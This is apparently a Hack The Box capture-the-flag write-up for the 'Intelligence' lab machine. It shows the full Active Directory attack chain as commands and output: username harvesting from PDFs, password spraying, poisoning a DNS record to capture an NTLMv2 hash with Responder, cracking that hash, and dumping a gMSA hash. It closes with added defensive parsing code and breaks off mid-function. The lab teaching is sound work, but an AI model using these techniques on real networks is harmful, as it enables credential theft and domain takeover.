HTB Intelligence Machine [MEDIUM]

Port scan

$ rustscan --accessible -a 10.129.85.15 --range 1-65535 --ulimit 5000 -- -sT -A -n -oN ports -Pn
PORT STATE SERVICE REASON VERSION
53/tcp open domain syn-ack Simple DNS Plus
80/tcp open http syn-ack Microsoft IIS httpd 10.0
|_http-favicon: Unknown favicon MD5: 556F31ACD686989B1AFCF382C05846AA
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/10.0
|_http-title: Intelligence
88/tcp open kerberos-sec syn-ack Microsoft Windows Kerberos (server time: 2021-07-04 16:20:31Z)
135/tcp open msrpc syn-ack Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Issuer: commonName=intelligence-DC-CA/domainComponent=intelligence
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-04-19T00:43:16
| Not valid after: 2022-04-19T00:43:16
| MD5: 7767 9533 67fb d65d 6065 dff7 7ad8 3e88
| SHA-1: 1555 29d9 fef8 1aec 41b7 dab2 84d7 0f9d 30c7 bde7
|_ssl-date: 2021-07-04T16:22:03+00:00; +6h59m55s from scanner time.
445/tcp open microsoft-ds? syn-ack
464/tcp open kpasswd5? syn-ack
593/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Issuer: commonName=intelligence-DC-CA/domainComponent=intelligence
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-04-19T00:43:16
| Not valid after: 2022-04-19T00:43:16
| MD5: 7767 9533 67fb d65d 6065 dff7 7ad8 3e88
| SHA-1: 1555 29d9 fef8 1aec 41b7 dab2 84d7 0f9d 30c7 bde7
|_ssl-date: 2021-07-04T16:22:03+00:00; +6h59m56s from scanner time.
3268/tcp open ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Issuer: commonName=intelligence-DC-CA/domainComponent=intelligence
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-04-19T00:43:16
| Not valid after: 2022-04-19T00:43:16
| MD5: 7767 9533 67fb d65d 6065 dff7 7ad8 3e88
| SHA-1: 1555 29d9 fef8 1aec 41b7 dab2 84d7 0f9d 30c7 bde7
|_ssl-date: 2021-07-04T16:22:05+00:00; +6h59m56s from scanner time.
3269/tcp open ssl/ldap syn-ack Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername:<unsupported>, DNS:dc.intelligence.htb
| Issuer: commonName=intelligence-DC-CA/domainComponent=intelligence
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2021-04-19T00:43:16
| Not valid after: 2022-04-19T00:43:16
| MD5: 7767 9533 67fb d65d 6065 dff7 7ad8 3e88
| SHA-1: 1555 29d9 fef8 1aec 41b7 dab2 84d7 0f9d 30c7 bde7
|_ssl-date: 2021-07-04T16:22:03+00:00; +6h59m56s from scanner time.
5985/tcp open http syn-ack Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp open mc-nmf syn-ack .NET Message Framing
49667/tcp open msrpc syn-ack Microsoft Windows RPC
49677/tcp open ncacn_http syn-ack Microsoft Windows RPC over HTTP 1.0
49678/tcp open msrpc syn-ack Microsoft Windows RPC
49694/tcp open msrpc syn-ack Microsoft Windows RPC
49700/tcp open msrpc syn-ack Microsoft Windows RPC
63408/tcp open msrpc syn-ack Microsoft Windows RPC
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

User Tiffany.Molina

Leaking file names via the Microsoft IIS tilde (8.3 short name) vulnerability

$ rustbuster tilde -u http://10.129.85.15 -X OPTIONS
⠁ [00:00:00]
Directory docume~1
File index~1.htm
[00:00:16] 591 requests done | req/s: 36 | queued reqs: 0

Requesting the documents directory returns a 403 error.

/images/HTB-Intelligence-Machine/Untitled.png

The site's home page links to two documents:

http://10.129.85.15/documents/2020-01-01-upload.pdf

http://10.129.85.15/documents/2020-12-15-upload.pdf

Downloading both PDFs and running exiftool on them reveals two usernames, Jose.Williams and William.Lee:

$ exiftool 2020-12-15-upload.pdf
ExifTool Version Number : 12.16
File Name : 2020-12-15-upload.pdf
Directory : .
File Size : 27 KiB
File Modification Date/Time : 2021:04:01 13:00:00-04:00
File Access Date/Time : 2021:07:04 05:31:53-04:00
File Inode Change Date/Time : 2021:07:04 05:31:53-04:00
File Permissions : rw-r--r--
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
PDF Version : 1.5
Linearized : No
Page Count : 1
Creator : Jose.Williams

$ exiftool 2020-01-01-upload.pdf
ExifTool Version Number : 12.16
File Name : 2020-01-01-upload.pdf
Directory : .
File Size : 26 KiB
File Modification Date/Time : 2021:04:01 13:00:00-04:00
File Access Date/Time : 2021:07:04 05:32:03-04:00
File Inode Change Date/Time : 2021:07:04 05:32:03-04:00
File Permissions : rw-r--r--
File Type : PDF
File Type Extension : pdf
MIME Type : application/pdf
PDF Version : 1.5
Linearized : No
Page Count : 1
Creator : William.Lee

Many more short names were also found under /documents, most of them PDF files; the ones whose names are in date format are of particular interest:

File 2021-0~1.pdf
File 2020-1~1.pdf
File 2020-0~1.pdf
File 2021-0~2.pdf
File 2021-0~3.pdf
File 2021-0~4.pdf
File 2020-1~3.pdf
File 2020-1~2.pdf
File 2020-1~4.pdf
File 2020-0~2.pdf
File 2020-0~3.pdf
File 2020-0~4.pdf

Based on the naming pattern of the two known PDFs, write a Python script that enumerates the remaining PDF files of the form YYYY-MM-DD-upload.pdf:

import requests

# Probe /documents/YYYY-MM-DD-upload.pdf for every day of 2020 and 2021
# and print the URLs that exist (HTTP 200).
for y in range(2020, 2022):
    for m in range(1, 13):
        for d in range(1, 32):
            url = f'http://intelligence.htb/documents/{y}-{m:02}-{d:02}-upload.pdf'
            if requests.get(url, timeout=10).status_code == 200:
                print(url)

When the script finishes it has found 99 PDFs. Save their URLs to pdf_urls and download all of them:

$ python3 pdf_enum.py > pdf_urls
$ wget -i pdf_urls

Run the following command to extract the author/creator usernames from these PDFs (duplicates are dropped while keeping first-seen order):

$ exiftool * | grep -i -E '(creator|author) [^T]' | awk '{print $3}' | awk '!seen[$0]++' > usernames
$ cat usernames
William.Lee
Scott.Scott
Jason.Wright
Veronica.Patel
Jennifer.Thomas
Danny.Matthews
David.Reed
Stephanie.Young
Daniel.Shelton
Jose.Williams
John.Coleman
Brian.Morris
Thomas.Valenzuela
Travis.Evans
Samuel.Richardson
Richard.Williams
David.Mcbride
Anita.Roberts
Brian.Baker
Kelly.Long
Nicole.Brock
Kaitlyn.Zimmerman
Jason.Patterson
Darryl.Harris
David.Wilson
Teresa.Williamson
Ian.Duncan
Jessica.Moody
Tiffany.Molina
Thomas.Hall

Run Impacket's GetNPUsers.py to see which of these users have UF_DONT_REQUIRE_PREAUTH set:

$ python3 ~/tools/impacket/examples/GetNPUsers.py -dc-ip 10.129.85.15 -no-pass -usersfile usernames intelligence/
[-] User William.Lee doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Scott.Scott doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Jason.Wright doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Veronica.Patel doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Jennifer.Thomas doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Danny.Matthews doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User David.Reed doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Stephanie.Young doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Daniel.Shelton doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Jose.Williams doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User John.Coleman doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Brian.Morris doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Thomas.Valenzuela doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Travis.Evans doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Samuel.Richardson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Richard.Williams doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User David.Mcbride doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Anita.Roberts doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Brian.Baker doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Kelly.Long doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Nicole.Brock doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Kaitlyn.Zimmerman doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Jason.Patterson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Darryl.Harris doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User David.Wilson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Teresa.Williamson doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Ian.Duncan doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Jessica.Moody doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Tiffany.Molina doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User Thomas.Hall doesn't have UF_DONT_REQUIRE_PREAUTH set

No user has UF_DONT_REQUIRE_PREAUTH set.

Let's convert the PDFs to text files and search their contents for useful information.

First install poppler-utils:

$ sudo apt install poppler-utils

Run the following script to convert every PDF in the current directory to TXT in the txt directory:

#!/bin/bash
# Convert every PDF in the current directory to text (preserving layout) under ./txt
mkdir -p txt
for pdf in *.pdf; do
    pdftotext -layout "$pdf" "txt/$pdf.txt"
done

Change into the txt directory and run the following command; it shows that 2020-06-04-upload.pdf.txt mentions a default password:

$ grep password -R
2020-06-04-upload.pdf.txt:Please login using your username and the default password of:
2020-06-04-upload.pdf.txt:After logging in please change your password as soon as possible.

Contents of 2020-06-04-upload.pdf.txt:

New Account Guide
Welcome to Intelligence Corp!
Please login using your username and the default password of:
NewIntelligenceCorpUser9876

After logging in please change your password as soon as possible.

This gives us the password NewIntelligenceCorpUser9876.

Use the msfconsole smb_login module to find out which users this password works for:

msf6 auxiliary(scanner/smb/smb_login) > set RHOSTS 10.129.85.15
RHOSTS => 10.129.85.15
msf6 auxiliary(scanner/smb/smb_login) > set USER_FILE documents/usernames
USER_FILE => documents/usernames
msf6 auxiliary(scanner/smb/smb_login) > set PASS_FILE documents/password
PASS_FILE => documents/password
msf6 auxiliary(scanner/smb/smb_login) > set stop_on_success true
stop_on_success => true

msf6 auxiliary(scanner/smb/smb_login) > run

[*] 10.129.85.15:445 - 10.129.85.15:445 - Starting SMB login bruteforce
[-] 10.129.85.15:445 - 10.129.85.15:445 - Failed: '.\William.Lee:NewIntelligenceCorpUser9876',
[!] 10.129.85.15:445 - No active DB -- Credential data will not be saved!
[-] 10.129.85.15:445 - 10.129.85.15:445 - Failed: '.\Scott.Scott:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445 - 10.129.85.15:445 - Failed: '.\Jason.Wright:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445 - 10.129.85.15:445 - Failed: '.\Veronica.Patel:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445 - 10.129.85.15:445 - Failed: '.\Jennifer.Thomas:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445 - 10.129.85.15:445 - Failed: '.\Danny.Matthews:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445 - 10.129.85.15:445 - Failed: '.\David.Reed:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445 - 10.129.85.15:445 - Failed: '.\Stephanie.Young:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445 - 10.129.85.15:445 - Failed: '.\Daniel.Shelton:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445 - 10.129.85.15:445 - Failed: '.\Jose.Williams:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445 - 10.129.85.15:445 - Failed: '.\John.Coleman:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445 - 10.129.85.15:445 - Failed: '.\Brian.Morris:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445 - 10.129.85.15:445 - Failed: '.\Thomas.Valenzuela:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445 - 10.129.85.15:445 - Failed: '.\Travis.Evans:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445 - 10.129.85.15:445 - Failed: '.\Samuel.Richardson:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445 - 10.129.85.15:445 - Failed: '.\Richard.Williams:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445 - 10.129.85.15:445 - Failed: '.\David.Mcbride:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445 - 10.129.85.15:445 - Failed: '.\Anita.Roberts:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445 - 10.129.85.15:445 - Failed: '.\Brian.Baker:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445 - 10.129.85.15:445 - Failed: '.\Kelly.Long:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445 - 10.129.85.15:445 - Failed: '.\Nicole.Brock:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445 - 10.129.85.15:445 - Failed: '.\Kaitlyn.Zimmerman:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445 - 10.129.85.15:445 - Failed: '.\Jason.Patterson:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445 - 10.129.85.15:445 - Failed: '.\Darryl.Harris:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445 - 10.129.85.15:445 - Failed: '.\David.Wilson:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445 - 10.129.85.15:445 - Failed: '.\Teresa.Williamson:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445 - 10.129.85.15:445 - Failed: '.\Ian.Duncan:NewIntelligenceCorpUser9876',
[-] 10.129.85.15:445 - 10.129.85.15:445 - Failed: '.\Jessica.Moody:NewIntelligenceCorpUser9876',
[+] 10.129.85.15:445 - 10.129.85.15:445 - Success: '.\Tiffany.Molina:NewIntelligenceCorpUser9876'
[*] 10.129.85.15:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

This yields the credentials .\Tiffany.Molina:NewIntelligenceCorpUser9876; use them to access SMB:

$ smbmap -H 10.129.85.15 -u 'Tiffany.Molina' -p 'NewIntelligenceCorpUser9876'
[+] IP: 10.129.85.15:445 Name: intelligence.htb
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
IT READ ONLY
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
Users READ ONLY

The Users share maps to the /Users directory:

$ smbclient //10.129.85.15/Users -U Tiffany.Molina
Enter WORKGROUP\Tiffany.Molina's password:
Try "help" to get a list of possible commands.
smb: \> ls
. DR 0 Sun Apr 18 21:20:26 2021
.. DR 0 Sun Apr 18 21:20:26 2021
Administrator D 0 Sun Apr 18 20:18:39 2021
All Users DHSrn 0 Sat Sep 15 03:21:46 2018
Default DHR 0 Sun Apr 18 22:17:40 2021
Default User DHSrn 0 Sat Sep 15 03:21:46 2018
desktop.ini AHS 174 Sat Sep 15 03:11:27 2018
Public DR 0 Sun Apr 18 20:18:39 2021
Ted.Graves D 0 Sun Apr 18 21:20:26 2021
Tiffany.Molina D 0 Sun Apr 18 20:51:46 2021

user.txt is found in \Tiffany.Molina\Desktop; nothing else useful was found in the Users share.

smb: \Tiffany.Molina\Desktop\> ls
. DR 0 Sun Apr 18 20:51:46 2021
.. DR 0 Sun Apr 18 20:51:46 2021
user.txt AR 34 Sun Jul 4 03:09:54 2021
smb: \Tiffany.Molina\Desktop\> get user.txt

User Ted.Graves

The NETLOGON share is empty and SYSVOL contains nothing useful.

The IT share contains a file named downdetector.ps1:

# Check web server status. Scheduled to run every 5min
Import-Module ActiveDirectory
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*") {
    try {
        $request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
        if($request.StatusCode -ne 200) {
            Send-MailMessage -From 'Ted Graves <Ted.Graves@intelligence.htb>' -To 'Ted Graves <Ted.Graves@intelligence.htb>' -Subject "Host: $($record.Name) is down"
        }
    } catch {}
}

This script is run by a scheduled task every 5 minutes.

It queries the LDAP container DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb (the AD-integrated DNS zone) and calls Invoke-WebRequest against every record in the result whose name starts with web.

Invoke-WebRequest is called with -UseDefaultCredentials, which makes it send the current user's default credentials (here those of Ted.Graves) whenever the server it contacts demands authentication.

downdetector.ps1 contains the username Ted.Graves. Searching the PDF documents for that name turns up some information about Ted, though nothing immediately useful:

$ grep -i ted -R
2020-12-30-upload.pdf.txt:There has recently been some outages on our web servers. Ted has gotten a

$ cat 2020-12-30-upload.pdf.txt
Internal IT Update
There has recently been some outages on our web servers. Ted has gotten a
script in place to help notify us if this happens again.
Also, after discussion following our recent security audit we are in the process
of locking down our service accounts.

Run the same LDAP query with ldapsearch, authenticating as Tiffany.Molina@intelligence.htb:NewIntelligenceCorpUser9876:

$ ldapsearch -H ldap://dc.intelligence.htb -x -W -D 'Tiffany.Molina@intelligence.htb' -b 'DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb' '(name=web*)'
Enter LDAP Password:
# extended LDIF
#
# LDAPv3
# base <DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb> with scope subtree
# filter: (name=web*)
# requesting: ALL
#

# web1, intelligence.htb, MicrosoftDNS, DomainDnsZones.intelligence.htb
dn: DC=web1,DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intellige
nce,DC=htb
objectClass: top
objectClass: dnsNode
distinguishedName: DC=web1,DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZon
es,DC=intelligence,DC=htb
instanceType: 4
whenCreated: 20210630005218.0Z
whenChanged: 20210630010959.0Z
uSNCreated: 106733
uSNChanged: 106745
showInAdvancedViewOnly: TRUE
name: web1
objectGUID:: lgDIMYr6GkmUtbsrvMeJoA==
dnsRecord:: CAAAAAUAAABcAAAAAAAAAAAAAAAAAAAAv4FzpUxt1wE=
objectCategory: CN=Dns-Node,CN=Schema,CN=Configuration,DC=intelligence,DC=htb
dSCorePropagationData: 16010101000000.0Z
dNSTombstoned: TRUE
dc: web1

# search result
search: 2
result: 0 Success

In addition, the entry DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb and its child entries can be modified by this user.

We can therefore change the dnsRecord attribute of DC=web1,DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb so that web1 resolves to our IP address (or create a new dnsNode entry whose name starts with web).

The script's requests are then sent to our IP address, where the credentials passed by Invoke-WebRequest can be obtained (provided a service is running there to capture them).

Apache Directory Studio is used here to work with LDAP (krbrelayx's dnstool.py can also add/modify DNS records in LDAP, but here it is done manually in Apache Directory Studio). First create an LDAP Connection:

/images/HTB-Intelligence-Machine/Untitled%201.png

/images/HTB-Intelligence-Machine/Untitled%202.png

Run the following script to generate the dnsRecord data:

import socket

# MS-DNSP dnsRecord for an A record: DataLength=4, Type=1 (A), Version=5,
# Rank=0xF0, Flags=0, Serial=0xB7, TtlSeconds=1200 (big-endian), Reserved=0,
# TimeStamp=0, followed by the 4 address octets.
# The last 4 bytes are your own IP address; this example uses 10.10.14.50.
payload = (
    b'\x04\x00\x01\x00\x05\xf0\x00\x00'
    b'\xb7\x00\x00\x00\x00\x00\x04\xb0'
    b'\x00\x00\x00\x00\x00\x00\x00\x00'
    + socket.inet_aton('10.10.14.50')
)
with open('payload-hex', 'wb') as f:
    f.write(payload)

For the meaning of the payload fields, see:

[MS-DNSP]: dnsRecord
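From the auditing side the same structure can be read back. The following Python is an added example (not from the original writeup, nor from krbrelayx) that decodes the MS-DNSP dnsRecord header and renders the tombstoned web1 record returned by the ldapsearch above together with a constructed A record; comparing a node's Type, Rank and Serial over time is how a change like the one performed here shows up in ADIDNS.

```python
import base64
import struct
from datetime import datetime, timedelta, timezone

# MS-DNSP 2.3.2.2 dnsRecord: DataLength, Type, Version, Rank, Flags, Serial
# (little-endian), then TtlSeconds (big-endian!), Reserved, TimeStamp, Data.
HEADER_FMT = "<HHBBHI"      # the first 12 header bytes
HEADER_LEN = 24
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)
TYPE_NAMES = {0x0000: "ZERO/TOMBSTONE", 0x0001: "A", 0x0005: "CNAME",
              0x000F: "MX", 0x0010: "TXT", 0x001C: "AAAA", 0x0021: "SRV"}


def filetime_to_datetime(ft):
    """Convert a 64-bit FILETIME (100 ns ticks since 1601-01-01 UTC)."""
    return FILETIME_EPOCH + timedelta(microseconds=ft // 10)


def parse_dns_record(blob):
    """Decode one dnsRecord value into its header fields plus a rendered Data."""
    if len(blob) < HEADER_LEN:
        raise ValueError(f"dnsRecord too short: {len(blob)} bytes")
    data_len, rtype, version, rank, flags, serial = struct.unpack_from(HEADER_FMT, blob, 0)
    (ttl,) = struct.unpack_from(">I", blob, 12)          # network byte order
    reserved, timestamp = struct.unpack_from("<II", blob, 16)
    data = blob[HEADER_LEN:HEADER_LEN + data_len]
    if len(data) != data_len:
        raise ValueError("DataLength exceeds blob size")
    rec = {"type": rtype, "type_name": TYPE_NAMES.get(rtype, f"0x{rtype:04x}"),
           "version": version, "rank": rank, "flags": flags, "serial": serial,
           "ttl": ttl, "reserved": reserved, "timestamp_hours": timestamp, "data": None}
    if rtype == 0x0000 and data_len == 8:
        # DNS_RPC_RECORD_TS: EntombedTime, the FILETIME at which the record was deleted
        (entombed,) = struct.unpack("<Q", data)
        rec["data"] = filetime_to_datetime(entombed).isoformat()
    elif rtype == 0x0001 and data_len == 4:
        rec["data"] = ".".join(str(b) for b in data)      # DNS_RPC_RECORD_A
    else:
        rec["data"] = data.hex()
    return rec


def parse_ldif_value(b64):
    """Wrapper for the base64 form ldapsearch prints ('dnsRecord:: ...')."""
    return parse_dns_record(base64.b64decode(b64))


# The web1 record exactly as returned by ldapsearch above (Type 0 = tombstoned).
WEB1_RECORD = "CAAAAAUAAABcAAAAAAAAAAAAAAAAAAAAv4FzpUxt1wE="

# Constructed sample of a live A record for comparison: Rank 0xF0 (zone record),
# Serial 1, TTL 1200 s, address 192.0.2.10 from the documentation range.
SAMPLE_A_RECORD = (struct.pack(HEADER_FMT, 4, 1, 5, 0xF0, 0, 1)
                   + struct.pack(">I", 1200) + struct.pack("<II", 0, 0)
                   + bytes([192, 0, 2, 10]))

if __name__ == "__main__":
    for label, rec in (("web1", parse_ldif_value(WEB1_RECORD)),
                       ("sample", parse_dns_record(SAMPLE_A_RECORD))):
        print(f"{label}: {rec['type_name']} data={rec['data']} "
              f"rank=0x{rec['rank']:02x} serial={rec['serial']} ttl={rec['ttl']}")
```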

Modify the dnsRecord attribute of DC=web1,DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb: double-click dnsRecord and import the generated payload-hex file, then change the dNSTombstoned attribute to FALSE.

/images/HTB-Intelligence-Machine/Untitled%203.png

Then run Responder and wait for the script on the target host to run:

$ sudo responder -I tun0 -A

After a while, Ted.Graves's Net-NTLMv2 hash is captured:

[+] Listening for events...
[HTTP] NTLMv2 Client : 10.129.85.15
[HTTP] NTLMv2 Username : intelligence\Ted.Graves
[HTTP] NTLMv2 Hash : Ted.Graves::intelligence:8fb39512d1ce1d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
[*] Skipping previously captured hash for intelligence\Ted.Graves

Cracking it with john gives Ted.Graves's password: Mr.Teddy.

$ john ted.graves.hashes --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (netntlmv2, NTLMv2 C/R [MD4 HMAC-MD5 32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Mr.Teddy (Ted.Graves)
1g 0:00:00:13 DONE (2021-07-04 13:10) 0.07570g/s 818734p/s 818734c/s 818734C/s Mrz.deltasigma..Morgant1
Use the "--show --format=netntlmv2" options to display all of the cracked passwords reliably
Session completed

Root

Accessing the SMB shares as Ted.Graves:Mr.Teddy turns up nothing new.

Via LDAP, the following Group Managed Service Account is found:

$ ldapsearch -H ldap://dc.intelligence.htb -x -W -D 'Ted.Graves@intelligence.htb' -b 'CN=Managed Service Accounts,DC=intelligence,DC=htb'

# svc_int, Managed Service Accounts, intelligence.htb
dn: CN=svc_int,CN=Managed Service Accounts,DC=intelligence,DC=htb
objectClass: top
objectClass: person
objectClass: organizationalPerson
objectClass: user
objectClass: computer
objectClass: msDS-GroupManagedServiceAccount
cn: svc_int
distinguishedName: CN=svc_int,CN=Managed Service Accounts,DC=intelligence,DC=htb
instanceType: 4
whenCreated: 20210419004958.0Z
whenChanged: 20210630005622.0Z
uSNCreated: 12846
uSNChanged: 106739
name: svc_int
objectGUID:: eaCA8SbzskmEoTSCQgjWQg==
userAccountControl: 16781312
badPwdCount: 0
codePage: 0
countryCode: 0
badPasswordTime: 0
lastLogoff: 0
lastLogon: 132694881825534026
localPolicyFlags: 0
pwdLastSet: 132694880879752841
primaryGroupID: 515
objectSid:: AQUAAAAAAAUVAAAARobx+nQXDcpGY+TMeAQAAA==
accountExpires: 9223372036854775807
logonCount: 1
sAMAccountName: svc_int$
sAMAccountType: 805306369
dNSHostName: svc_int.intelligence.htb
objectCategory: CN=ms-DS-Group-Managed-Service-Account,CN=Schema,CN=Configuration,DC=intelligence,DC=htb
isCriticalSystemObject: FALSE
dSCorePropagationData: 16010101000000.0Z
lastLogonTimestamp: 132694881825534026
msDS-AllowedToDelegateTo: WWW/dc.intelligence.htb
msDS-SupportedEncryptionTypes: 28
msDS-ManagedPasswordId:: AQAAAEtEU0sCAAAAZwEAAB0AAAAYAAAAWa6dT0SPVr+SpfQILta2EQAAAAAiAAAAIgAAAGkAbgB0AGUAbABsAGkAZwBlAG4AYwBlAC4AaAB0AGIAAABpAG4AdABlAGwAbABpAGcAZQBuAGMAZQAuAGgAdABiAAAA
msDS-ManagedPasswordPreviousId:: AQAAAEtEU0sCAAAAZwEAABsAAAAQAAAAWa6dT0SPVr+SpfQILta2EQAAAAAiAAAAIgAAAGkAbgB0AGUAbABsAGkAZwBlAG4AYwBlAC4AaAB0AGIAAABpAG4AdABlAGwAbABpAGcAZQBuAGMAZQAuAGgAdABiAAAA
msDS-ManagedPasswordInterval: 30
msDS-GroupMSAMembership:: AQAEgBQAAAAAAAAAAAAAACQAAAABAgAAAAAABSAAAAAgAgAABABQAAIAAAAAACQA/wEPAAEFAAAAAAAFFQAAAEaG8fp0Fw3KRmPkzOgDAAAAACQA/wEPAAEFAAAAAAAFFQAAAEaG8fp0Fw3KRmPkzHYEAAA=

Use gMSADumper.py to retrieve the NT hash of svc_int$:

$ python3 gMSADumper.py -u 'Ted.Graves' -p 'Mr.Teddy' -d 'intelligence.htb'
svc_int$:::d64b83fe606e6d3005e20ce0ee932fe2

The script reads the msDS-ManagedPassword attribute of CN=svc_int,CN=Managed Service Accounts,DC=intelligence,DC=htb over LDAP, which yields the MSDS-MANAGEDPASSWORD_BLOB of svc_int$, then parses the blob and outputs the NT hash.

The msDS-ManagedPassword attribute is described as follows:

gMSA is short for group managed service accounts in Active Directory. gMSA accounts have their passwords stored in an LDAP property called msDS-ManagedPassword which automatically gets reset by the DCs every 30 days, and is retrievable by authorized administrators and by the servers they are installed on. msDS-ManagedPassword is an encrypted data blob called MSDS-MANAGEDPASSWORD_BLOB and it's only retrievable when the connection is secured, LDAPS or when the authentication type is 'Sealing & Secure' for example. (Source: https://cube0x0.github.io/Relaying-for-gMSA/)
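The question a defender asks here is who counts as "authorized": that is decided by msDS-GroupMSAMembership, the security descriptor returned in the ldapsearch output above. The following Python is an added example (not part of the writeup or of gMSADumper) that parses that self-relative SECURITY_DESCRIPTOR and lists the SIDs permitted to read the managed password; the two RIDs it prints for svc_int still have to be resolved to account or group names against objectSid in the directory.

```python
import base64
import struct

# msDS-GroupMSAMembership is a self-relative SECURITY_DESCRIPTOR (MS-DTYP 2.4.6).
# Each ACCESS_ALLOWED ACE in its DACL names a principal that may read
# msDS-ManagedPassword, i.e. recover the gMSA's current password and NT hash.
SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0x00
ACCESS_DENIED_ACE_TYPE = 0x01


def parse_sid(buf, off):
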